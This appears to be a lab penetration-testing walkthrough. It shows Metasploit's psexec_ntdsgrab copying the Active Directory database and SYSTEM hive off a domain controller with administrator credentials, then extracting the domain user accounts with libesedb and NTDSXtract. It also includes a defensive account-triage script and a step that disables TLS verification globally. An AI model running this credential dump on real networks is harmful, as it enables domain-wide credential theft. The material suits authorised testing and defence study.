psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show options
Module options (auxiliary/admin/smb/psexec_ntdsgrab):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATE_NEW_VSC false no If true, attempts to create a volume shadow copy
RHOST 192.168.10.32 yes The target address
RPORT 445 yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain PENTEST.COM no The Windows domain to use for authentication
SMBPass pass1234PASS~ no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser administrator no The username to authenticate as
VSCPATH no The path to the target Volume Shadow Copy
WINPATH Windows yes The name of the Windows directory (examples: WINDOWS, WINNT)
msf auxiliary(psexec_ntdsgrab) > run
[*] 192.168.10.32:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Checking if NTDS.dit was copied.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Downloading ntds.dit file
[+] 192.168.10.32:445 - ntds.dit stored at /home/notfound/.msf4/loot/20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
[*] 192.168.10.32:445 - Downloading SYSTEM hive file
[+] 192.168.10.32:445 - SYSTEM hive stored at /home/notfound/.msf4/loot/20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
[*] 192.168.10.32:445 - Executing cleanup...
[*] 192.168.10.32:445 - Cleanup was successful
[*] Auxiliary module execution completed
Install libesedb
root:/ /# uname -a
Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh        # clones the libyal helper libraries the build needs from GitHub
root:/tmp/ntds /# git config --global http.sslverify false   # disables TLS verification for every git operation on this box; undo with "git config --global --unset http.sslverify" once the build is done
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install        # default prefix is /usr/local; the loader cache does not know about the new library yet
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig             # refresh the shared-library cache so libesedb.so.1 in /usr/local/lib is found
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
esedbexport 20150409
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag1) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 33572
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root 9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root 1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root 72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root 613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root 42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root 1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root 5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root 57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root 103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x 5 root root 4096 Sep 12 12:44 ntdsxtract
-rw-r--r-- 1 root root 57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root 152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root 80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root 771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root 180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root 75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root 3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root 23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root 14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root 96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root 182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root 50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root 67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /#
NTDSXTRACT
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
[+] Started at: Sat, 12 Sep 2015 04:49:55 UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 3458 records processed
[+] Sanity checks...
Schema record id: 1774
Schema type id: 10
[+] Extracting schema information - 100% -> 1517 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
Record ID: 3510
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 6b36f08b-c8cf-4eab-9e18-ae1bdce0e4f6
SID: S-1-5-21-495298362-4107897003-3932503283-500
When created: 2015-04-11 10:08:32+00:00
When changed: 2015-09-11 17:15:30+00:00
Account expires: Never
Password last set: 2015-09-11 17:15:30.234375+00:00
Last logon: 2015-09-11 17:15:59.890625+00:00
Last logon timestamp: 2015-09-11 17:15:30.218750+00:00
Bad password time 2015-04-11 13:34:02.937500+00:00
Logon count: 19
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Administrator
Record ID: 3511
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 5d3b8bbf-5d0a-4573-96fa-ecdf0d68b2b9
SID: S-1-5-21-495298362-4107897003-3932503283-501
When created: 2015-04-11 10:08:32+00:00
When changed: 2015-04-11 10:08:32+00:00
Account expires: Never
Password last set: Never
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
PWD_NOTREQD
NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Guest
Record ID: 3557
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: d4a001b1-1d6f-4033-8396-5b50ed442416
SID: S-1-5-21-495298362-4107897003-3932503283-502
When created: 2015-04-11 10:21:27+00:00
When changed: 2015-04-11 10:36:38+00:00
Account expires: Never
Password last set: 2015-04-11 10:21:27.750000+00:00
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, krbtgt
Record ID: 3717
User name: python
User principal name:
SAM Account name: python
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 37218973-1887-4768-a98b-c9c797769ebc
SID: S-1-5-21-495298362-4107897003-3932503283-1111
When created: 2015-04-11 10:40:57+00:00
When changed: 2015-04-11 10:42:50+00:00
Account expires: Never
Password last set: 2015-04-11 10:40:57.406250+00:00
Last logon: 2015-04-11 11:27:15.796875+00:00
Last logon timestamp: 2015-04-11 10:42:50.531250+00:00
Bad password time 2015-04-11 11:26:15.359375+00:00
Logon count: 36
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, python
Record ID: 3720
User name: juzi
User principal name:
SAM Account name: juzi
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: b29311a1-595a-4a8c-a292-2f623ad2969b
SID: S-1-5-21-495298362-4107897003-3932503283-1114
When created: 2015-04-11 10:42:09+00:00
When changed: 2015-04-11 10:47:14+00:00
Account expires: Never
Password last set: 2015-04-11 10:42:09.375000+00:00
Last logon: 2015-04-11 11:50:41.937500+00:00
Last logon timestamp: 2015-04-11 10:47:14.015625+00:00
Bad password time 2015-04-11 10:54:08.187500+00:00
Logon count: 7
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, juzi
Record ID: 3722
User name: jin
User principal name:
SAM Account name: jin
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 23b53357-d35c-4586-a239-cd930497bf7a
SID: S-1-5-21-495298362-4107897003-3932503283-1116
When created: 2015-04-11 10:46:32+00:00
When changed: 2015-04-11 10:49:45+00:00
Account expires: Never
Password last set: 2015-04-11 10:46:32.250000+00:00
Last logon: 2015-04-11 10:49:49+00:00
Last logon timestamp: 2015-04-11 10:49:45.875000+00:00
Bad password time Never
Logon count: 5
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, jin
Record ID: 3726
User name: debug
User principal name:
SAM Account name: debug
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 114da9cb-7770-4ec8-b2b1-03b2505521db
SID: S-1-5-21-495298362-4107897003-3932503283-1119
When created: 2015-04-11 10:56:04+00:00
When changed: 2015-04-11 10:58:13+00:00
Account expires: Never
Password last set: 2015-04-11 10:56:04.515625+00:00
Last logon: 2015-04-11 17:17:21.250000+00:00
Last logon timestamp: 2015-04-11 10:58:13+00:00
Bad password time Never
Logon count: 95
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, debug
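The dsusers.py run above lists account metadata only: the tool decrypts password hashes only when it is also handed the SYSTEM hive (`--syshive <hive>`) together with `--passwordhashes`. To make the fields it prints less of a black box, here is an added example (my own code, not part of the page, of NTDSXtract or of libesedb) that reads the esedbexport dump of datatable directly and triages accounts from the raw attributes: it decodes the userAccountControl bit mask into the flag names shown above, converts the FILETIME values behind "Password last set" and "Last logon timestamp", and flags accounts with no password required, non-expiring passwords, Kerberos pre-authentication disabled, or a stale password. Assumptions: esedbexport writes each table as a tab-separated file whose first line holds the column names; the `ATT<type><attributeId>` column names used below are the ones NTDSXtract maps for sAMAccountName, sAMAccountType, userAccountControl, pwdLastSet and lastLogonTimestamp (check them against the header of your own datatable.3); and the sample rows are constructed, patterned on the Administrator and Guest records above plus an invented svc_backup account and a computer account.

```python
"""Triage user accounts straight from an esedbexport dump of datatable.

Added example, not code from the original page or from NTDSXtract.
Column names and the sample dump are assumptions (see comments).
"""
from datetime import datetime, timedelta, timezone

# Column names as they appear in an esedbexport datatable dump (assumed:
# ATT + type letter + attributeId, the mapping NTDSXtract relies on).
COL_SAM_NAME = "ATTm590045"       # sAMAccountName
COL_SAM_TYPE = "ATTj590126"       # sAMAccountType
COL_UAC = "ATTj589832"            # userAccountControl
COL_PWD_LAST_SET = "ATTq589920"   # pwdLastSet, FILETIME
COL_LAST_LOGON_TS = "ATTq591520"  # lastLogonTimestamp, FILETIME

SAM_NORMAL_USER_ACCOUNT = 0x30000000   # computers are 0x30000001 and are skipped

# userAccountControl bits in ascending order, so output matches dsusers.py.
UAC_FLAGS = [
    (0x00000002, "ACCOUNTDISABLE"),
    (0x00000020, "PWD_NOTREQD"),
    (0x00000200, "NORMAL_ACCOUNT"),
    (0x00010000, "DONT_EXPIRE_PASSWORD"),
    (0x00400000, "DONT_REQ_PREAUTH"),
]

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample dump: header line plus four records. The FILETIME
# 130732205120000000 is 2015-04-11 10:08:32 UTC (the domain's creation time
# above); 130855392000000000 is 2015-09-01 00:00:00 UTC.
SAMPLE_DATATABLE = "\n".join([
    "\t".join(["DNT_col", COL_SAM_NAME, COL_SAM_TYPE, COL_UAC,
               COL_PWD_LAST_SET, COL_LAST_LOGON_TS]),
    "3510\tAdministrator\t805306368\t512\t130732205120000000\t130732205120000000",
    "3511\tGuest\t805306368\t66082\t0\t",
    "3900\tsvc_backup\t805306368\t4260352\t130855392000000000\t130855392000000000",
    "3601\tDC01$\t805306369\t532480\t130732205120000000\t",
])

# Analysis date; the ls listing above is from Sep 12 2015.
REFERENCE_NOW = datetime(2015, 9, 12, tzinfo=timezone.utc)


def filetime_to_datetime(value):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime, None if never set."""
    if not value or int(value) == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def decode_uac(uac):
    """Bit mask -> list of flag names, lowest bit first."""
    return [name for bit, name in UAC_FLAGS if uac & bit]


def parse_datatable(text):
    """Return one dict per user account (sAMAccountType == normal user)."""
    lines = text.splitlines()
    idx = {name: i for i, name in enumerate(lines[0].split("\t"))}
    users = []
    for line in lines[1:]:
        if not line:
            continue
        cols = line.split("\t")

        def col(name):
            i = idx.get(name)
            return cols[i] if i is not None and i < len(cols) else ""

        if col(COL_SAM_TYPE) != str(SAM_NORMAL_USER_ACCOUNT):
            continue  # computers, groups, schema and other objects
        users.append({
            "name": col(COL_SAM_NAME),
            "uac": decode_uac(int(col(COL_UAC) or 0)),
            "pwd_last_set": filetime_to_datetime(col(COL_PWD_LAST_SET)),
            "last_logon_ts": filetime_to_datetime(col(COL_LAST_LOGON_TS)),
        })
    return users


def triage(users, now, max_password_age_days=90):
    """(name, reason) pairs for enabled accounts worth a second look."""
    findings = []
    for u in users:
        flags = set(u["uac"])
        if "ACCOUNTDISABLE" in flags:
            continue
        if "PWD_NOTREQD" in flags:
            findings.append((u["name"], "password not required"))
        if "DONT_EXPIRE_PASSWORD" in flags:
            findings.append((u["name"], "password never expires"))
        if "DONT_REQ_PREAUTH" in flags:
            findings.append((u["name"], "Kerberos pre-auth disabled (AS-REP roastable)"))
        if u["pwd_last_set"] is None:
            findings.append((u["name"], "password never set"))
        elif now - u["pwd_last_set"] > timedelta(days=max_password_age_days):
            findings.append((u["name"], "password older than %d days" % max_password_age_days))
    return findings


def demo():
    """Run the triage over the constructed sample dump."""
    return triage(parse_datatable(SAMPLE_DATATABLE), REFERENCE_NOW)


if __name__ == "__main__":
    for name, reason in demo():
        print("%-16s %s" % (name, reason))
```

Point it at the real file with `parse_datatable(open("datatable.3").read())`; on an 11 MB dump the header lookup keeps the pass over the rows cheap, and because disabled accounts are dropped from the findings the built-in Guest (disabled, PWD_NOTREQD, DONT_EXPIRE_PASSWORD) does not clutter the list while an enabled account with the same flags would.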
References
http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/